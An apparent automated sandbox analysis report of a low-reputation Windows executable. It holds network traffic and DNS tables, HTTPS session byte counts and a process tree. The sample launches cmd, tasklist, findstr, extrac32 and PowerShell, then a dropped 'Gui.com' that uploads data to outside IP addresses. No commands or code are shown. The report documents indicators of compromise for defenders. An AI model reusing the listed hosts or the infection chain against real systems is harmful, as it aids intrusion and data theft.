Jan 10, 2025 11:16:35.444216967 CET | 443 | 49786 | 104.21.80.1 | 192.168.2.5 |
Jan 10, 2025 11:16:35.444335938 CET | 49786 | 443 | 192.168.2.5 | 104.21.80.1 |
Jan 10, 2025 11:16:35.444525957 CET | 49786 | 443 | 192.168.2.5 | 104.21.80.1 |
Jan 10, 2025 11:16:35.444526911 CET | 49786 | 443 | 192.168.2.5 | 104.21.80.1 |
Jan 10, 2025 11:16:35.444561005 CET | 443 | 49786 | 104.21.80.1 | 192.168.2.5 |
Jan 10, 2025 11:16:35.444586039 CET | 443 | 49786 | 104.21.80.1 | 192.168.2.5 |
Jan 10, 2025 11:16:35.560185909 CET | 49792 | 443 | 192.168.2.5 | 185.161.251.21 |
Jan 10, 2025 11:16:35.560231924 CET | 443 | 49792 | 185.161.251.21 | 192.168.2.5 |
Jan 10, 2025 11:16:35.560312986 CET | 49792 | 443 | 192.168.2.5 | 185.161.251.21 |
Jan 10, 2025 11:16:35.560596943 CET | 49792 | 443 | 192.168.2.5 | 185.161.251.21 |
Jan 10, 2025 11:16:35.560612917 CET | 443 | 49792 | 185.161.251.21 | 192.168.2.5 |
Jan 10, 2025 11:16:36.300659895 CET | 443 | 49792 | 185.161.251.21 | 192.168.2.5 |
Jan 10, 2025 11:16:36.300749063 CET | 49792 | 443 | 192.168.2.5 | 185.161.251.21 |
Jan 10, 2025 11:16:36.306704044 CET | 49792 | 443 | 192.168.2.5 | 185.161.251.21 |
Jan 10, 2025 11:16:36.306718111 CET | 443 | 49792 | 185.161.251.21 | 192.168.2.5 |
Jan 10, 2025 11:16:36.307121038 CET | 443 | 49792 | 185.161.251.21 | 192.168.2.5 |
Jan 10, 2025 11:16:36.309530020 CET | 49792 | 443 | 192.168.2.5 | 185.161.251.21 |
Jan 10, 2025 11:16:36.351321936 CET | 443 | 49792 | 185.161.251.21 | 192.168.2.5 |
Jan 10, 2025 11:16:36.561459064 CET | 443 | 49792 | 185.161.251.21 | 192.168.2.5 |
Jan 10, 2025 11:16:36.561537981 CET | 443 | 49792 | 185.161.251.21 | 192.168.2.5 |
Jan 10, 2025 11:16:36.561638117 CET | 49792 | 443 | 192.168.2.5 | 185.161.251.21 |
Jan 10, 2025 11:16:36.563000917 CET | 49792 | 443 | 192.168.2.5 | 185.161.251.21 |
Jan 10, 2025 11:16:36.563016891 CET | 443 | 49792 | 185.161.251.21 | 192.168.2.5 |
Jan 10, 2025 11:16:36.563029051 CET | 49792 | 443 | 192.168.2.5 | 185.161.251.21 |
Jan 10, 2025 11:16:36.563035011 CET | 443 | 49792 | 185.161.251.21 | 192.168.2.5 |
Jan 10, 2025 11:16:36.767256021 CET | 49803 | 443 | 192.168.2.5 | 104.21.15.122 |
Jan 10, 2025 11:16:36.767297029 CET | 443 | 49803 | 104.21.15.122 | 192.168.2.5 |
Jan 10, 2025 11:16:36.767379045 CET | 49803 | 443 | 192.168.2.5 | 104.21.15.122 |
Jan 10, 2025 11:16:36.767657995 CET | 49803 | 443 | 192.168.2.5 | 104.21.15.122 |
Jan 10, 2025 11:16:36.767676115 CET | 443 | 49803 | 104.21.15.122 | 192.168.2.5 |
Jan 10, 2025 11:16:37.449490070 CET | 443 | 49803 | 104.21.15.122 | 192.168.2.5 |
Jan 10, 2025 11:16:37.449553967 CET | 49803 | 443 | 192.168.2.5 | 104.21.15.122 |
Jan 10, 2025 11:16:37.452011108 CET | 49803 | 443 | 192.168.2.5 | 104.21.15.122 |
Jan 10, 2025 11:16:37.452024937 CET | 443 | 49803 | 104.21.15.122 | 192.168.2.5 |
Jan 10, 2025 11:16:37.452370882 CET | 443 | 49803 | 104.21.15.122 | 192.168.2.5 |
Jan 10, 2025 11:16:37.453639030 CET | 49803 | 443 | 192.168.2.5 | 104.21.15.122 |
Jan 10, 2025 11:16:37.495347023 CET | 443 | 49803 | 104.21.15.122 | 192.168.2.5 |
Jan 10, 2025 11:16:37.572633028 CET | 443 | 49803 | 104.21.15.122 | 192.168.2.5 |
Jan 10, 2025 11:16:37.572686911 CET | 443 | 49803 | 104.21.15.122 | 192.168.2.5 |
Jan 10, 2025 11:16:37.572740078 CET | 49803 | 443 | 192.168.2.5 | 104.21.15.122 |
Jan 10, 2025 11:16:37.572755098 CET | 443 | 49803 | 104.21.15.122 | 192.168.2.5 |
Jan 10, 2025 11:16:37.572962999 CET | 49803 | 443 | 192.168.2.5 | 104.21.15.122 |
Jan 10, 2025 11:16:37.572974920 CET | 443 | 49803 | 104.21.15.122 | 192.168.2.5 |
Jan 10, 2025 11:16:37.573481083 CET | 443 | 49803 | 104.21.15.122 | 192.168.2.5 |
Jan 10, 2025 11:16:37.573520899 CET | 443 | 49803 | 104.21.15.122 | 192.168.2.5 |
Jan 10, 2025 11:16:37.573533058 CET | 49803 | 443 | 192.168.2.5 | 104.21.15.122 |
Jan 10, 2025 11:16:37.573540926 CET | 443 | 49803 | 104.21.15.122 | 192.168.2.5 |
Jan 10, 2025 11:16:37.573590040 CET | 49803 | 443 | 192.168.2.5 | 104.21.15.122 |
Jan 10, 2025 11:16:37.573597908 CET | 443 | 49803 | 104.21.15.122 | 192.168.2.5 |
Jan 10, 2025 11:16:37.577485085 CET | 443 | 49803 | 104.21.15.122 | 192.168.2.5 |
Jan 10, 2025 11:16:37.577522993 CET | 443 | 49803 | 104.21.15.122 | 192.168.2.5 |
Jan 10, 2025 11:16:37.577533960 CET | 49803 | 443 | 192.168.2.5 | 104.21.15.122 |
Jan 10, 2025 11:16:37.577542067 CET | 443 | 49803 | 104.21.15.122 | 192.168.2.5 |
Jan 10, 2025 11:16:37.577740908 CET | 49803 | 443 | 192.168.2.5 | 104.21.15.122 |
Jan 10, 2025 11:16:37.661186934 CET | 443 | 49803 | 104.21.15.122 | 192.168.2.5 |
Jan 10, 2025 11:16:37.661330938 CET | 443 | 49803 | 104.21.15.122 | 192.168.2.5 |
Jan 10, 2025 11:16:37.661387920 CET | 49803 | 443 | 192.168.2.5 | 104.21.15.122 |
Jan 10, 2025 11:16:37.661808014 CET | 49803 | 443 | 192.168.2.5 | 104.21.15.122 |
Jan 10, 2025 11:16:37.661819935 CET | 443 | 49803 | 104.21.15.122 | 192.168.2.5 |
Jan 10, 2025 11:16:37.661834955 CET | 49803 | 443 | 192.168.2.5 | 104.21.15.122 |
Jan 10, 2025 11:16:37.661840916 CET | 443 | 49803 | 104.21.15.122 | 192.168.2.5 |
Timestamp | Source Port | Dest Port | Source IP | Dest IP |
---|---|---|---|---|
Jan 10, 2025 11:16:14.493365049 CET | 62806 | 53 | 192.168.2.5 | 1.1.1.1 |
Jan 10, 2025 11:16:14.501493931 CET | 53 | 62806 | 1.1.1.1 | 192.168.2.5 |
Jan 10, 2025 11:16:25.127717972 CET | 63428 | 53 | 192.168.2.5 | 1.1.1.1 |
Jan 10, 2025 11:16:25.137386084 CET | 53 | 63428 | 1.1.1.1 | 192.168.2.5 |
Jan 10, 2025 11:16:25.140782118 CET | 57712 | 53 | 192.168.2.5 | 1.1.1.1 |
Jan 10, 2025 11:16:25.149308920 CET | 53 | 57712 | 1.1.1.1 | 192.168.2.5 |
Jan 10, 2025 11:16:25.150625944 CET | 58510 | 53 | 192.168.2.5 | 1.1.1.1 |
Jan 10, 2025 11:16:25.235713959 CET | 53 | 58510 | 1.1.1.1 | 192.168.2.5 |
Jan 10, 2025 11:16:25.238548994 CET | 52244 | 53 | 192.168.2.5 | 1.1.1.1 |
Jan 10, 2025 11:16:25.246871948 CET | 53 | 52244 | 1.1.1.1 | 192.168.2.5 |
Jan 10, 2025 11:16:25.248967886 CET | 64838 | 53 | 192.168.2.5 | 1.1.1.1 |
Jan 10, 2025 11:16:25.258018970 CET | 53 | 64838 | 1.1.1.1 | 192.168.2.5 |
Jan 10, 2025 11:16:25.260066032 CET | 53648 | 53 | 192.168.2.5 | 1.1.1.1 |
Jan 10, 2025 11:16:25.268909931 CET | 53 | 53648 | 1.1.1.1 | 192.168.2.5 |
Jan 10, 2025 11:16:25.270925999 CET | 52928 | 53 | 192.168.2.5 | 1.1.1.1 |
Jan 10, 2025 11:16:25.280198097 CET | 53 | 52928 | 1.1.1.1 | 192.168.2.5 |
Jan 10, 2025 11:16:25.282334089 CET | 54789 | 53 | 192.168.2.5 | 1.1.1.1 |
Jan 10, 2025 11:16:25.290923119 CET | 53 | 54789 | 1.1.1.1 | 192.168.2.5 |
Jan 10, 2025 11:16:25.293211937 CET | 56194 | 53 | 192.168.2.5 | 1.1.1.1 |
Jan 10, 2025 11:16:25.301908970 CET | 53 | 56194 | 1.1.1.1 | 192.168.2.5 |
Jan 10, 2025 11:16:25.303867102 CET | 63384 | 53 | 192.168.2.5 | 1.1.1.1 |
Jan 10, 2025 11:16:25.311060905 CET | 53 | 63384 | 1.1.1.1 | 192.168.2.5 |
Jan 10, 2025 11:16:26.575706005 CET | 58486 | 53 | 192.168.2.5 | 1.1.1.1 |
Jan 10, 2025 11:16:26.589169025 CET | 53 | 58486 | 1.1.1.1 | 192.168.2.5 |
Jan 10, 2025 11:16:35.446950912 CET | 60897 | 53 | 192.168.2.5 | 1.1.1.1 |
Jan 10, 2025 11:16:35.556596041 CET | 53 | 60897 | 1.1.1.1 | 192.168.2.5 |
Jan 10, 2025 11:16:36.753477097 CET | 59350 | 53 | 192.168.2.5 | 1.1.1.1 |
Jan 10, 2025 11:16:36.766427040 CET | 53 | 59350 | 1.1.1.1 | 192.168.2.5 |
Jan 10, 2025 11:16:37.542437077 CET | 63884 | 53 | 192.168.2.5 | 1.1.1.1 |
Jan 10, 2025 11:16:37.551546097 CET | 53 | 63884 | 1.1.1.1 | 192.168.2.5 |
Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS |
---|---|---|---|---|---|---|---|---|
Jan 10, 2025 11:16:14.493365049 CET | 192.168.2.5 | 1.1.1.1 | 0xcaba | Standard query (0) | A (IP address) | IN (0x0001) | false | |
Jan 10, 2025 11:16:25.127717972 CET | 192.168.2.5 | 1.1.1.1 | 0xe147 | Standard query (0) | A (IP address) | IN (0x0001) | false | |
Jan 10, 2025 11:16:25.140782118 CET | 192.168.2.5 | 1.1.1.1 | 0x59f9 | Standard query (0) | A (IP address) | IN (0x0001) | false | |
Jan 10, 2025 11:16:25.150625944 CET | 192.168.2.5 | 1.1.1.1 | 0x3717 | Standard query (0) | A (IP address) | IN (0x0001) | false | |
Jan 10, 2025 11:16:25.238548994 CET | 192.168.2.5 | 1.1.1.1 | 0x7f55 | Standard query (0) | A (IP address) | IN (0x0001) | false | |
Jan 10, 2025 11:16:25.248967886 CET | 192.168.2.5 | 1.1.1.1 | 0x6ccb | Standard query (0) | A (IP address) | IN (0x0001) | false | |
Jan 10, 2025 11:16:25.260066032 CET | 192.168.2.5 | 1.1.1.1 | 0x51dd | Standard query (0) | A (IP address) | IN (0x0001) | false | |
Jan 10, 2025 11:16:25.270925999 CET | 192.168.2.5 | 1.1.1.1 | 0xef75 | Standard query (0) | A (IP address) | IN (0x0001) | false | |
Jan 10, 2025 11:16:25.282334089 CET | 192.168.2.5 | 1.1.1.1 | 0x5255 | Standard query (0) | A (IP address) | IN (0x0001) | false | |
Jan 10, 2025 11:16:25.293211937 CET | 192.168.2.5 | 1.1.1.1 | 0xc567 | Standard query (0) | A (IP address) | IN (0x0001) | false | |
Jan 10, 2025 11:16:25.303867102 CET | 192.168.2.5 | 1.1.1.1 | 0x30d6 | Standard query (0) | A (IP address) | IN (0x0001) | false | |
Jan 10, 2025 11:16:26.575706005 CET | 192.168.2.5 | 1.1.1.1 | 0x5760 | Standard query (0) | A (IP address) | IN (0x0001) | false | |
Jan 10, 2025 11:16:35.446950912 CET | 192.168.2.5 | 1.1.1.1 | 0x6de1 | Standard query (0) | A (IP address) | IN (0x0001) | false | |
Jan 10, 2025 11:16:36.753477097 CET | 192.168.2.5 | 1.1.1.1 | 0x67cc | Standard query (0) | A (IP address) | IN (0x0001) | false | |
Jan 10, 2025 11:16:37.542437077 CET | 192.168.2.5 | 1.1.1.1 | 0x96c0 | Standard query (0) | A (IP address) | IN (0x0001) | false |
Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS |
---|---|---|---|---|---|---|---|---|---|---|
Jan 10, 2025 11:16:14.501493931 CET | 1.1.1.1 | 192.168.2.5 | 0xcaba | Name error (3) | none | none | A (IP address) | IN (0x0001) | false | |
Jan 10, 2025 11:16:25.137386084 CET | 1.1.1.1 | 192.168.2.5 | 0xe147 | Name error (3) | none | none | A (IP address) | IN (0x0001) | false | |
Jan 10, 2025 11:16:25.149308920 CET | 1.1.1.1 | 192.168.2.5 | 0x59f9 | Name error (3) | none | none | A (IP address) | IN (0x0001) | false | |
Jan 10, 2025 11:16:25.235713959 CET | 1.1.1.1 | 192.168.2.5 | 0x3717 | Name error (3) | none | none | A (IP address) | IN (0x0001) | false | |
Jan 10, 2025 11:16:25.246871948 CET | 1.1.1.1 | 192.168.2.5 | 0x7f55 | Name error (3) | none | none | A (IP address) | IN (0x0001) | false | |
Jan 10, 2025 11:16:25.258018970 CET | 1.1.1.1 | 192.168.2.5 | 0x6ccb | Name error (3) | none | none | A (IP address) | IN (0x0001) | false | |
Jan 10, 2025 11:16:25.268909931 CET | 1.1.1.1 | 192.168.2.5 | 0x51dd | Name error (3) | none | none | A (IP address) | IN (0x0001) | false | |
Jan 10, 2025 11:16:25.280198097 CET | 1.1.1.1 | 192.168.2.5 | 0xef75 | Name error (3) | none | none | A (IP address) | IN (0x0001) | false | |
Jan 10, 2025 11:16:25.290923119 CET | 1.1.1.1 | 192.168.2.5 | 0x5255 | Name error (3) | none | none | A (IP address) | IN (0x0001) | false | |
Jan 10, 2025 11:16:25.301908970 CET | 1.1.1.1 | 192.168.2.5 | 0xc567 | Name error (3) | none | none | A (IP address) | IN (0x0001) | false | |
Jan 10, 2025 11:16:25.311060905 CET | 1.1.1.1 | 192.168.2.5 | 0x30d6 | No error (0) | 104.102.49.254 | A (IP address) | IN (0x0001) | false | ||
Jan 10, 2025 11:16:26.589169025 CET | 1.1.1.1 | 192.168.2.5 | 0x5760 | No error (0) | 104.21.80.1 | A (IP address) | IN (0x0001) | false | ||
Jan 10, 2025 11:16:26.589169025 CET | 1.1.1.1 | 192.168.2.5 | 0x5760 | No error (0) | 104.21.16.1 | A (IP address) | IN (0x0001) | false | ||
Jan 10, 2025 11:16:26.589169025 CET | 1.1.1.1 | 192.168.2.5 | 0x5760 | No error (0) | 104.21.48.1 | A (IP address) | IN (0x0001) | false | ||
Jan 10, 2025 11:16:26.589169025 CET | 1.1.1.1 | 192.168.2.5 | 0x5760 | No error (0) | 104.21.32.1 | A (IP address) | IN (0x0001) | false | ||
Jan 10, 2025 11:16:26.589169025 CET | 1.1.1.1 | 192.168.2.5 | 0x5760 | No error (0) | 104.21.112.1 | A (IP address) | IN (0x0001) | false | ||
Jan 10, 2025 11:16:26.589169025 CET | 1.1.1.1 | 192.168.2.5 | 0x5760 | No error (0) | 104.21.96.1 | A (IP address) | IN (0x0001) | false | ||
Jan 10, 2025 11:16:26.589169025 CET | 1.1.1.1 | 192.168.2.5 | 0x5760 | No error (0) | 104.21.64.1 | A (IP address) | IN (0x0001) | false | ||
Jan 10, 2025 11:16:35.556596041 CET | 1.1.1.1 | 192.168.2.5 | 0x6de1 | No error (0) | 185.161.251.21 | A (IP address) | IN (0x0001) | false | ||
Jan 10, 2025 11:16:36.766427040 CET | 1.1.1.1 | 192.168.2.5 | 0x67cc | No error (0) | 104.21.15.122 | A (IP address) | IN (0x0001) | false | ||
Jan 10, 2025 11:16:36.766427040 CET | 1.1.1.1 | 192.168.2.5 | 0x67cc | No error (0) | 172.67.162.153 | A (IP address) | IN (0x0001) | false | ||
Jan 10, 2025 11:16:37.551546097 CET | 1.1.1.1 | 192.168.2.5 | 0x96c0 | Name error (3) | none | none | A (IP address) | IN (0x0001) | false |
|
Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process |
---|---|---|---|---|---|---|
0 | 192.168.2.5 | 49716 | 104.102.49.254 | 443 | 1476 | C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\473587\Gui.com |
Timestamp | Bytes transferred | Direction | Data |
---|---|---|---|
2025-01-10 10:16:26 UTC | 219 | OUT | |
2025-01-10 10:16:26 UTC | 1905 | IN | |
2025-01-10 10:16:26 UTC | 14479 | IN | |
2025-01-10 10:16:26 UTC | 16384 | IN | |
2025-01-10 10:16:26 UTC | 3768 | IN | |
2025-01-10 10:16:26 UTC | 495 | IN |
Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process |
---|---|---|---|---|---|---|
1 | 192.168.2.5 | 49727 | 104.21.80.1 | 443 | 1476 | C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\473587\Gui.com |
Timestamp | Bytes transferred | Direction | Data |
---|---|---|---|
2025-01-10 10:16:27 UTC | 263 | OUT | |
2025-01-10 10:16:27 UTC | 8 | OUT | |
2025-01-10 10:16:27 UTC | 1123 | IN | |
2025-01-10 10:16:27 UTC | 7 | IN | |
2025-01-10 10:16:27 UTC | 5 | IN |
Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process |
---|---|---|---|---|---|---|
2 | 192.168.2.5 | 49735 | 104.21.80.1 | 443 | 1476 | C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\473587\Gui.com |
Timestamp | Bytes transferred | Direction | Data |
---|---|---|---|
2025-01-10 10:16:28 UTC | 264 | OUT | |
2025-01-10 10:16:28 UTC | 76 | OUT | |
2025-01-10 10:16:28 UTC | 1127 | IN | |
2025-01-10 10:16:28 UTC | 242 | IN | |
2025-01-10 10:16:28 UTC | 1369 | IN | |
2025-01-10 10:16:28 UTC | 1369 | IN | |
2025-01-10 10:16:28 UTC | 1369 | IN | |
2025-01-10 10:16:28 UTC | 1369 | IN | |
2025-01-10 10:16:28 UTC | 1369 | IN | |
2025-01-10 10:16:28 UTC | 277 | IN | |
2025-01-10 10:16:28 UTC | 1369 | IN | |
2025-01-10 10:16:28 UTC | 1369 | IN |
Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process |
---|---|---|---|---|---|---|
3 | 192.168.2.5 | 49741 | 104.21.80.1 | 443 | 1476 | C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\473587\Gui.com |
Timestamp | Bytes transferred | Direction | Data |
---|---|---|---|
2025-01-10 10:16:29 UTC | 275 | OUT | |
2025-01-10 10:16:29 UTC | 12790 | OUT | |
2025-01-10 10:16:29 UTC | 1124 | IN | |
2025-01-10 10:16:29 UTC | 20 | IN | |
2025-01-10 10:16:29 UTC | 5 | IN |
Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process |
---|---|---|---|---|---|---|
4 | 192.168.2.5 | 49752 | 104.21.80.1 | 443 | 1476 | C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\473587\Gui.com |
Timestamp | Bytes transferred | Direction | Data |
---|---|---|---|
2025-01-10 10:16:30 UTC | 277 | OUT | |
2025-01-10 10:16:30 UTC | 15044 | OUT | |
2025-01-10 10:16:31 UTC | 1132 | IN | |
2025-01-10 10:16:31 UTC | 20 | IN | |
2025-01-10 10:16:31 UTC | 5 | IN |
Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process |
---|---|---|---|---|---|---|
5 | 192.168.2.5 | 49763 | 104.21.80.1 | 443 | 1476 | C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\473587\Gui.com |
Timestamp | Bytes transferred | Direction | Data |
---|---|---|---|
2025-01-10 10:16:31 UTC | 275 | OUT | |
2025-01-10 10:16:31 UTC | 15331 | OUT | |
2025-01-10 10:16:31 UTC | 5191 | OUT | |
2025-01-10 10:16:32 UTC | 1119 | IN | |
2025-01-10 10:16:32 UTC | 20 | IN | |
2025-01-10 10:16:32 UTC | 5 | IN |
Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process |
---|---|---|---|---|---|---|
6 | 192.168.2.5 | 49769 | 104.21.80.1 | 443 | 1476 | C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\473587\Gui.com |
Timestamp | Bytes transferred | Direction | Data |
---|---|---|---|
2025-01-10 10:16:32 UTC | 270 | OUT | |
2025-01-10 10:16:32 UTC | 913 | OUT | |
2025-01-10 10:16:33 UTC | 1122 | IN | |
2025-01-10 10:16:33 UTC | 20 | IN | |
2025-01-10 10:16:33 UTC | 5 | IN |
Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process |
---|---|---|---|---|---|---|
7 | 192.168.2.5 | 49778 | 104.21.80.1 | 443 | 1476 | C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\473587\Gui.com |
Timestamp | Bytes transferred | Direction | Data |
---|---|---|---|
2025-01-10 10:16:33 UTC | 276 | OUT | |
2025-01-10 10:16:33 UTC | 1095 | OUT | |
2025-01-10 10:16:34 UTC | 1128 | IN | |
2025-01-10 10:16:34 UTC | 20 | IN | |
2025-01-10 10:16:34 UTC | 5 | IN |
Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process |
---|---|---|---|---|---|---|
8 | 192.168.2.5 | 49786 | 104.21.80.1 | 443 | 1476 | C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\473587\Gui.com |
Timestamp | Bytes transferred | Direction | Data |
---|---|---|---|
2025-01-10 10:16:34 UTC | 265 | OUT | |
2025-01-10 10:16:34 UTC | 111 | OUT | |
2025-01-10 10:16:35 UTC | 1124 | IN | |
2025-01-10 10:16:35 UTC | 218 | IN | |
2025-01-10 10:16:35 UTC | 5 | IN |
Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process |
---|---|---|---|---|---|---|
9 | 192.168.2.5 | 49792 | 185.161.251.21 | 443 | 1476 | C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\473587\Gui.com |
Timestamp | Bytes transferred | Direction | Data |
---|---|---|---|
2025-01-10 10:16:36 UTC | 201 | OUT | |
2025-01-10 10:16:36 UTC | 249 | IN | |
2025-01-10 10:16:36 UTC | 329 | IN |
Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process |
---|---|---|---|---|---|---|
10 | 192.168.2.5 | 49803 | 104.21.15.122 | 443 | 1476 | C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\473587\Gui.com |
Timestamp | Bytes transferred | Direction | Data |
---|---|---|---|
2025-01-10 10:16:37 UTC | 204 | OUT | |
2025-01-10 10:16:37 UTC | 801 | IN | |
2025-01-10 10:16:37 UTC | 568 | IN | |
2025-01-10 10:16:37 UTC | 1369 | IN | |
2025-01-10 10:16:37 UTC | 1369 | IN | |
2025-01-10 10:16:37 UTC | 1369 | IN | |
2025-01-10 10:16:37 UTC | 1369 | IN | |
2025-01-10 10:16:37 UTC | 1369 | IN | |
2025-01-10 10:16:37 UTC | 1369 | IN | |
2025-01-10 10:16:37 UTC | 1369 | IN | |
2025-01-10 10:16:37 UTC | 1369 | IN | |
2025-01-10 10:16:37 UTC | 1369 | IN |
Click to jump to process
Click to jump to process
back
Click to dive into process behavior distribution
Click to jump to process
Target ID: | 0 |
Start time: | 05:16:07 |
Start date: | 10/01/2025 |
Path: | C:\Users\user\Desktop\appFile.exe |
Wow64 process (32bit): | true |
Commandline: | |
Imagebase: | 0x400000 |
File size: | 38'010'389 bytes |
MD5 hash: | 8E9470197062CC090F733B985F2DE5D4 |
Has elevated privileges: | true |
Has administrator privileges: | true |
Programmed in: | C, C++ or other language |
Reputation: | low |
Has exited: | true |
Target ID: | 2 |
Start time: | 05:16:08 |
Start date: | 10/01/2025 |
Path: | C:\Windows\SysWOW64\cmd.exe |
Wow64 process (32bit): | true |
Commandline: | |
Imagebase: | 0x790000 |
File size: | 236'544 bytes |
MD5 hash: | D0FCE3AFA6AA1D58CE9FA336CC2B675B |
Has elevated privileges: | true |
Has administrator privileges: | true |
Programmed in: | C, C++ or other language |
Reputation: | high |
Has exited: | true |
Target ID: | 3 |
Start time: | 05:16:08 |
Start date: | 10/01/2025 |
Path: | C:\Windows\System32\conhost.exe |
Wow64 process (32bit): | false |
Commandline: | |
Imagebase: | 0x7ff6d64d0000 |
File size: | 862'208 bytes |
MD5 hash: | 0D698AF330FD17BEE3BF90011D49251D |
Has elevated privileges: | true |
Has administrator privileges: | true |
Programmed in: | C, C++ or other language |
Reputation: | high |
Has exited: | true |
Target ID: | 4 |
Start time: | 05:16:10 |
Start date: | 10/01/2025 |
Path: | C:\Windows\SysWOW64\tasklist.exe |
Wow64 process (32bit): | true |
Commandline: | |
Imagebase: | 0x8a0000 |
File size: | 79'360 bytes |
MD5 hash: | 0A4448B31CE7F83CB7691A2657F330F1 |
Has elevated privileges: | true |
Has administrator privileges: | true |
Programmed in: | C, C++ or other language |
Reputation: | high |
Has exited: | true |
Target ID: | 5 |
Start time: | 05:16:10 |
Start date: | 10/01/2025 |
Path: | C:\Windows\SysWOW64\findstr.exe |
Wow64 process (32bit): | true |
Commandline: | |
Imagebase: | 0xa30000 |
File size: | 29'696 bytes |
MD5 hash: | F1D4BE0E99EC734376FDE474A8D4EA3E |
Has elevated privileges: | true |
Has administrator privileges: | true |
Programmed in: | C, C++ or other language |
Reputation: | high |
Has exited: | true |
Target ID: | 6 |
Start time: | 05:16:11 |
Start date: | 10/01/2025 |
Path: | C:\Windows\SysWOW64\tasklist.exe |
Wow64 process (32bit): | true |
Commandline: | |
Imagebase: | 0x8a0000 |
File size: | 79'360 bytes |
MD5 hash: | 0A4448B31CE7F83CB7691A2657F330F1 |
Has elevated privileges: | true |
Has administrator privileges: | true |
Programmed in: | C, C++ or other language |
Reputation: | high |
Has exited: | true |
Target ID: | 7 |
Start time: | 05:16:11 |
Start date: | 10/01/2025 |
Path: | C:\Windows\SysWOW64\findstr.exe |
Wow64 process (32bit): | true |
Commandline: | |
Imagebase: | 0xa30000 |
File size: | 29'696 bytes |
MD5 hash: | F1D4BE0E99EC734376FDE474A8D4EA3E |
Has elevated privileges: | true |
Has administrator privileges: | true |
Programmed in: | C, C++ or other language |
Reputation: | high |
Has exited: | true |
Target ID: | 8 |
Start time: | 05:16:12 |
Start date: | 10/01/2025 |
Path: | C:\Windows\SysWOW64\cmd.exe |
Wow64 process (32bit): | true |
Commandline: | |
Imagebase: | 0x790000 |
File size: | 236'544 bytes |
MD5 hash: | D0FCE3AFA6AA1D58CE9FA336CC2B675B |
Has elevated privileges: | true |
Has administrator privileges: | true |
Programmed in: | C, C++ or other language |
Reputation: | high |
Has exited: | true |
Target ID: | 9 |
Start time: | 05:16:12 |
Start date: | 10/01/2025 |
Path: | C:\Windows\SysWOW64\extrac32.exe |
Wow64 process (32bit): | true |
Commandline: | |
Imagebase: | 0xd0000 |
File size: | 29'184 bytes |
MD5 hash: | 9472AAB6390E4F1431BAA912FCFF9707 |
Has elevated privileges: | true |
Has administrator privileges: | true |
Programmed in: | C, C++ or other language |
Reputation: | moderate |
Has exited: | true |
Target ID: | 10 |
Start time: | 05:16:13 |
Start date: | 10/01/2025 |
Path: | C:\Windows\SysWOW64\findstr.exe |
Wow64 process (32bit): | true |
Commandline: | |
Imagebase: | 0xa30000 |
File size: | 29'696 bytes |
MD5 hash: | F1D4BE0E99EC734376FDE474A8D4EA3E |
Has elevated privileges: | true |
Has administrator privileges: | true |
Programmed in: | C, C++ or other language |
Has exited: | true |
Target ID: | 11 |
Start time: | 05:16:13 |
Start date: | 10/01/2025 |
Path: | C:\Windows\SysWOW64\cmd.exe |
Wow64 process (32bit): | true |
Commandline: | |
Imagebase: | 0x790000 |
File size: | 236'544 bytes |
MD5 hash: | D0FCE3AFA6AA1D58CE9FA336CC2B675B |
Has elevated privileges: | true |
Has administrator privileges: | true |
Programmed in: | C, C++ or other language |
Has exited: | true |
Target ID: | 12 |
Start time: | 05:16:13 |
Start date: | 10/01/2025 |
Path: | C:\Windows\SysWOW64\cmd.exe |
Wow64 process (32bit): | true |
Commandline: | |
Imagebase: | 0x790000 |
File size: | 236'544 bytes |
MD5 hash: | D0FCE3AFA6AA1D58CE9FA336CC2B675B |
Has elevated privileges: | true |
Has administrator privileges: | true |
Programmed in: | C, C++ or other language |
Has exited: | true |
Target ID: | 13 |
Start time: | 05:16:13 |
Start date: | 10/01/2025 |
Path: | C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\473587\Gui.com |
Wow64 process (32bit): | true |
Commandline: | |
Imagebase: | 0x70000 |
File size: | 947'288 bytes |
MD5 hash: | 62D09F076E6E0240548C2F837536A46A |
Has elevated privileges: | true |
Has administrator privileges: | true |
Programmed in: | C, C++ or other language |
Antivirus matches: |
|
Has exited: | true |
Target ID: | 14 |
Start time: | 05:16:13 |
Start date: | 10/01/2025 |
Path: | C:\Windows\SysWOW64\choice.exe |
Wow64 process (32bit): | true |
Commandline: | |
Imagebase: | 0x5d0000 |
File size: | 28'160 bytes |
MD5 hash: | FCE0E41C87DC4ABBE976998AD26C27E4 |
Has elevated privileges: | true |
Has administrator privileges: | true |
Programmed in: | C, C++ or other language |
Has exited: | true |
Target ID: | 16 |
Start time: | 05:16:35 |
Start date: | 10/01/2025 |
Path: | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe |
Wow64 process (32bit): | true |
Commandline: | |
Imagebase: | 0xae0000 |
File size: | 433'152 bytes |
MD5 hash: | C32CA4ACFCC635EC1EA6ED8A34DF5FAC |
Has elevated privileges: | true |
Has administrator privileges: | true |
Programmed in: | C, C++ or other language |
Has exited: | true |
Target ID: | 17 |
Start time: | 05:16:36 |
Start date: | 10/01/2025 |
Path: | C:\Windows\System32\conhost.exe |
Wow64 process (32bit): | false |
Commandline: | |
Imagebase: | 0x7ff6d64d0000 |
File size: | 862'208 bytes |
